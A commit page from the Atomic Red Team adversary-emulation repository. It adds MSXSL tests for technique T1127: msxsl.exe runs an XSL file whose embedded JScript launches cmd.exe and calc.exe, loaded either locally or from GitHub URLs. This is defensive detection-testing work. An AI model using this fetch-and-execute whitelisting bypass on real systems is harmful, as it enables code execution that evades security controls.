security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added remote test, simplified script file

Browse Source
This commit is contained in:
Tony M Lambert
2018-09-14 20:35:48 -05:00
parent ddd0e81e54
commit 03adb61ee4
5 changed files with 74 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1127/T1127.md
+42
View File
@@ -58,6 +58,10 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)
- [Atomic Test #2 - MSXSL Bypass using local files](#atomic-test-2---msxsl-bypass-using-local-files)
- [Atomic Test #3 - MSXSL Bypass using remote files](#atomic-test-3---msxsl-bypass-using-remote-files)
<br/>
@@ -77,3 +81,41 @@ Executes the code in a project file using. C# Example
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
```
<br/>
<br/>
## Atomic Test #2 - MSXSL Bypass using local files
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl|
#### Run it with `command_prompt`!
```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
<br/>
<br/>
## Atomic Test #3 - MSXSL Bypass using remote files
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl|
#### Run it with `command_prompt`!
```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
<br/>
atomics/T1127/T1127.yaml
+23 -4
View File
@@ -17,21 +17,40 @@ atomic_tests:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
- name: MSXSL Bypass
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft.
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Location of the test XML file. May be a URL.
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
xslfile:
description: Location of the test XSL script file. May be a URL.
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
atomics/T1127/src/msxsl-script.xsl
+1 -4
View File
@@ -5,10 +5,7 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
return nodelist.nextNode().xml;
}
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
atomics/index.md
+4
View File
@@ -262,6 +262,8 @@
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -495,6 +497,8 @@
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1047 Windows Management Instrumentation](./T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
atomics/windows-index.md
+4
View File
@@ -91,6 +91,8 @@
- [T1099 Timestomp](./T1099/T1099.md)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -408,6 +410,8 @@
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1047 Windows Management Instrumentation](./T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]